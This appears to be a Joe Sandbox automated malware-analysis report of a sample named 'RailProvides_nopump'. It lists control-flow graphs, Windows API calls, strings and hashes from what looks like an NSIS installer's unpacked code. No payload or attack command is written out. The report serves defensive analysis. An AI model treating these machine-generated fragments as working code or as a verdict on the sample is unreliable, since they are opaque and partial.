                                                                    control_flow_graph 159 4015a0-4015f4 160 4030e3-4030ec 159->160 161 4015fa 159->161 185 4030ee-4030f2 160->185 163 401601-401611 call 4062a3 161->163 164 401742-40174f 161->164 165 401962-40197d call 40145c GetFullPathNameW 161->165 166 4019ca-4019e6 call 40145c SearchPathW 161->166 167 40176e-401794 call 40145c call 4062a3 SetFileAttributesW 161->167 168 401650-40166d call 40137e call 4062a3 call 40139d 161->168 169 4017b1-4017d8 call 40145c call 4062a3 call 405d59 161->169 170 401672-401686 call 40145c call 4062a3 161->170 171 401693-4016ac call 401446 call 4062a3 161->171 172 401715-401731 161->172 173 401616-40162d call 40145c call 4062a3 call 404f72 161->173 174 4016d6-4016db 161->174 175 401736-4030de 161->175 176 401897-4018a7 call 40145c call 4062d5 161->176 177 4018db-401910 call 40145c * 3 call 4062a3 MoveFileW 161->177 178 40163c-401645 161->178 179 4016bd-4016d1 call 4062a3 SetForegroundWindow 161->179 163->185 189 401751-401755 ShowWindow 164->189 190 401758-40175f 164->190 224 4019a3-4019a8 165->224 225 40197f-401984 165->225 166->160 217 4019ec-4019f8 166->217 167->160 242 40179a-4017a6 call 4062a3 167->242 168->185 264 401864-40186c 169->264 265 4017de-4017fc call 405d06 CreateDirectoryW 169->265 243 401689-40168e call 404f72 170->243 248 4016b1-4016b8 Sleep 171->248 249 4016ae-4016b0 171->249 172->185 186 401632-401637 173->186 183 401702-401710 174->183 184 4016dd-4016fd call 401446 174->184 175->160 219 4030de call 405f51 175->219 244 4018c2-4018d6 call 4062a3 176->244 245 4018a9-4018bd call 4062a3 176->245 272 401912-401919 177->272 273 40191e-401921 177->273 178->186 187 401647-40164e PostQuitMessage 178->187 179->160 183->160 184->160 186->185 187->186 189->190 190->160 208 401765-401769 ShowWindow 190->208 208->160 217->160 219->160 228 4019af-4019b2 224->228 225->228 235 401986-401989 225->235 228->160 238 4019b8-4019c5 GetShortPathNameW 228->238 235->228 246 40198b-401993 call 4062d5 235->246 238->160 259 4017ab-4017ac 242->259 243->160 244->185 245->185 246->224 269 401995-4019a1 call 406009 246->269 248->160 249->248 259->160 267 401890-401892 264->267 268 40186e-40188b call 404f72 call 406009 SetCurrentDirectoryW 264->268 277 401846-40184e call 4062a3 265->277 278 4017fe-401809 GetLastError 265->278 267->243 268->160 269->228 272->243 279 401923-40192b call 4062d5 273->279 280 40194a-401950 273->280 292 401853-401854 277->292 283 401827-401832 GetFileAttributesW 278->283 284 40180b-401825 GetLastError call 4062a3 278->284 279->280 298 40192d-401948 call 406c68 call 404f72 279->298 288 401957-40195d call 4062a3 280->288 290 401834-401844 call 4062a3 283->290 291 401855-40185e 283->291 284->291 288->259 290->292 291->264 291->265 292->291 298->288
                                                                    APIs
                                                                    • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                    • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                    • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                    • ShowWindow.USER32(?), ref: 00401753
                                                                    • ShowWindow.USER32(?), ref: 00401767
                                                                    • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                    • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                    • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                    • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                    • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                    • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                    • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                    • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                    Strings
                                                                    • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                    • Jump: %d, xrefs: 00401602
                                                                    • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                    • Call: %d, xrefs: 0040165A
                                                                    • Rename failed: %s, xrefs: 0040194B
                                                                    • BringToFront, xrefs: 004016BD
                                                                    • Aborting: "%s", xrefs: 0040161D
                                                                    • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                    • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                    • Sleep(%d), xrefs: 0040169D
                                                                    • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                    • SetFileAttributes failed., xrefs: 004017A1
                                                                    • CreateDirectory: "%s" created, xrefs: 00401849
                                                                    • Rename on reboot: %s, xrefs: 00401943
                                                                    • Rename: %s, xrefs: 004018F8
                                                                    • detailprint: %s, xrefs: 00401679
                                                                    • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                    • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                    • API String ID: 2872004960-3619442763
                                                                    • Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                                    • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                                                    • Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                                    • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 426 40592c-405944 call 4062fc 429 405946-405956 call 405f51 426->429 430 405958-405990 call 405ed3 426->430 438 4059b3-4059dc call 403e95 call 40677e 429->438 435 405992-4059a3 call 405ed3 430->435 436 4059a8-4059ae lstrcatW 430->436 435->436 436->438 444 405a70-405a78 call 40677e 438->444 445 4059e2-4059e7 438->445 451 405a86-405a8d 444->451 452 405a7a-405a81 call 406805 444->452 445->444 446 4059ed-405a15 call 405ed3 445->446 446->444 453 405a17-405a1b 446->453 455 405aa6-405acb LoadImageW 451->455 456 405a8f-405a95 451->456 452->451 460 405a1d-405a2c call 405d06 453->460 461 405a2f-405a3b lstrlenW 453->461 458 405ad1-405b13 RegisterClassW 455->458 459 405b66-405b6e call 40141d 455->459 456->455 457 405a97-405a9c call 403e74 456->457 457->455 465 405c35 458->465 466 405b19-405b61 SystemParametersInfoW CreateWindowExW 458->466 478 405b70-405b73 459->478 479 405b78-405b83 call 403e95 459->479 460->461 462 405a63-405a6b call 406722 call 406009 461->462 463 405a3d-405a4b lstrcmpiW 461->463 462->444 463->462 470 405a4d-405a57 GetFileAttributesW 463->470 469 405c37-405c3e 465->469 466->459 475 405a59-405a5b 470->475 476 405a5d-405a5e call 406751 470->476 475->462 475->476 476->462 478->469 484 405b89-405ba6 ShowWindow LoadLibraryW 479->484 485 405c0c-405c0d call 405047 479->485 487 405ba8-405bad LoadLibraryW 484->487 488 405baf-405bc1 GetClassInfoW 484->488 491 405c12-405c14 485->491 487->488 489 405bc3-405bd3 GetClassInfoW RegisterClassW 488->489 490 405bd9-405bfc DialogBoxParamW call 40141d 488->490 489->490 495 405c01-405c0a call 403c68 490->495 493 405c16-405c1c 491->493 494 405c2e-405c30 call 40141d 491->494 493->478 496 405c22-405c29 call 40141d 493->496 494->465 495->469 496->478
                                                                    APIs
                                                                      • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                      • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                      • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                    • lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
                                                                    • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                                                    • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                                                    • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                                                      • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                    • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                                                    • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                                                    • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                                                      • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                                                    • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
                                                                    • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                                                    • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                                                    • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                                                    • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                                                    • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                    • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                    • API String ID: 608394941-1650083594
                                                                    • Opcode ID: 0b5ab136357e203ee2e090d14ec2b93cf78a9c4147554daf2c52a3a548f14690
                                                                    • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                                                    • Opcode Fuzzy Hash: 0b5ab136357e203ee2e090d14ec2b93cf78a9c4147554daf2c52a3a548f14690
                                                                    • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                    • lstrcatW.KERNEL32(00000000,00000000,WarsFeltMadridFarmsPee,004CB0B0,00000000,00000000), ref: 00401A76
                                                                    • CompareFileTime.KERNEL32(-00000014,?,WarsFeltMadridFarmsPee,WarsFeltMadridFarmsPee,00000000,00000000,WarsFeltMadridFarmsPee,004CB0B0,00000000,00000000), ref: 00401AA0
                                                                      • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                      • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                      • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                    • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$WarsFeltMadridFarmsPee
                                                                    • API String ID: 4286501637-4051260161
                                                                    • Opcode ID: b155778cc10115f8d02ccc56e208397f172a866a515c636f57ea647fec07d827
                                                                    • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                                                    • Opcode Fuzzy Hash: b155778cc10115f8d02ccc56e208397f172a866a515c636f57ea647fec07d827
                                                                    • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 653 403587-4035d5 GetTickCount GetModuleFileNameW call 405e50 656 4035e1-40360f call 406009 call 406751 call 406009 GetFileSize 653->656 657 4035d7-4035dc 653->657 665 403615 656->665 666 4036fc-40370a call 4032d2 656->666 658 4037b6-4037ba 657->658 668 40361a-403631 665->668 672 403710-403713 666->672 673 4037c5-4037ca 666->673 670 403633 668->670 671 403635-403637 call 403336 668->671 670->671 677 40363c-40363e 671->677 675 403715-40372d call 403368 call 403336 672->675 676 40373f-403769 GlobalAlloc call 403368 call 40337f 672->676 673->658 675->673 703 403733-403739 675->703 676->673 701 40376b-40377c 676->701 679 403644-40364b 677->679 680 4037bd-4037c4 call 4032d2 677->680 685 4036c7-4036cb 679->685 686 40364d-403661 call 405e0c 679->686 680->673 689 4036d5-4036db 685->689 690 4036cd-4036d4 call 4032d2 685->690 686->689 700 403663-40366a 686->700 697 4036ea-4036f4 689->697 698 4036dd-4036e7 call 407281 689->698 690->689 697->668 702 4036fa 697->702 698->697 700->689 706 40366c-403673 700->706 707 403784-403787 701->707 708 40377e 701->708 702->666 703->673 703->676 706->689 709 403675-40367c 706->709 710 40378a-403792 707->710 708->707 709->689 711 40367e-403685 709->711 710->710 712 403794-4037af SetFilePointer call 405e0c 710->712 711->689 713 403687-4036a7 711->713 716 4037b4 712->716 713->673 715 4036ad-4036b1 713->715 717 4036b3-4036b7 715->717 718 4036b9-4036c1 715->718 716->658 717->702 717->718 718->689 719 4036c3-4036c5 718->719 719->689
                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 00403598
                                                                    • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                                                      • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                      • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                    • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                                                    Strings
                                                                    • soft, xrefs: 00403675
                                                                    • Error launching installer, xrefs: 004035D7
                                                                    • Null, xrefs: 0040367E
                                                                    • Inst, xrefs: 0040366C
                                                                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                    • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                    • API String ID: 4283519449-527102705
                                                                    • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                    • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                                                    • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                    • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 720 40337f-403396 721 403398 720->721 722 40339f-4033a7 720->722 721->722 723 4033a9 722->723 724 4033ae-4033b3 722->724 723->724 725 4033c3-4033d0 call 403336 724->725 726 4033b5-4033be call 403368 724->726 730 4033d2 725->730 731 4033da-4033e1 725->731 726->725 732 4033d4-4033d5 730->732 733 4033e7-403407 GetTickCount call 4072f2 731->733 734 403518-40351a 731->734 735 403539-40353d 732->735 746 403536 733->746 748 40340d-403415 733->748 736 40351c-40351f 734->736 737 40357f-403583 734->737 739 403521 736->739 740 403524-40352d call 403336 736->740 741 403540-403546 737->741 742 403585 737->742 739->740 740->730 755 403533 740->755 744 403548 741->744 745 40354b-403559 call 403336 741->745 742->746 744->745 745->730 757 40355f-403572 WriteFile 745->757 746->735 751 403417 748->751 752 40341a-403428 call 403336 748->752 751->752 752->730 758 40342a-403433 752->758 755->746 759 403511-403513 757->759 760 403574-403577 757->760 761 403439-403456 call 407312 758->761 759->732 760->759 762 403579-40357c 760->762 765 40350a-40350c 761->765 766 40345c-403473 GetTickCount 761->766 762->737 765->732 767 403475-40347d 766->767 768 4034be-4034c2 766->768 769 403485-4034b6 MulDiv wsprintfW call 404f72 767->769 770 40347f-403483 767->770 771 4034c4-4034c7 768->771 772 4034ff-403502 768->772 778 4034bb 769->778 770->768 770->769 775 4034e7-4034ed 771->775 776 4034c9-4034db WriteFile 771->776 772->748 773 403508 772->773 773->746 777 4034f3-4034f7 775->777 776->759 779 4034dd-4034e0 776->779 777->761 781 4034fd 777->781 778->768 779->759 780 4034e2-4034e5 779->780 780->777 781->746
                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 004033E7
                                                                    • GetTickCount.KERNEL32 ref: 00403464
                                                                    • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                                                    • wsprintfW.USER32 ref: 004034A4
                                                                    • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                                                    • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: CountFileTickWrite$wsprintf
                                                                    • String ID: ... %d%%$P1B$X1C$X1C
                                                                    • API String ID: 651206458-1535804072
                                                                    • Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                                    • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                                                                    • Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                                    • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 782 404f72-404f85 783 405042-405044 782->783 784 404f8b-404f9e 782->784 785 404fa0-404fa4 call 406805 784->785 786 404fa9-404fb5 lstrlenW 784->786 785->786 788 404fd2-404fd6 786->788 789 404fb7-404fc7 lstrlenW 786->789 792 404fe5-404fe9 788->792 793 404fd8-404fdf SetWindowTextW 788->793 790 405040-405041 789->790 791 404fc9-404fcd lstrcatW 789->791 790->783 791->788 794 404feb-40502d SendMessageW * 3 792->794 795 40502f-405031 792->795 793->792 794->795 795->790 796 405033-405038 795->796 796->790
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                    • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                    • lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                    • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                      • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
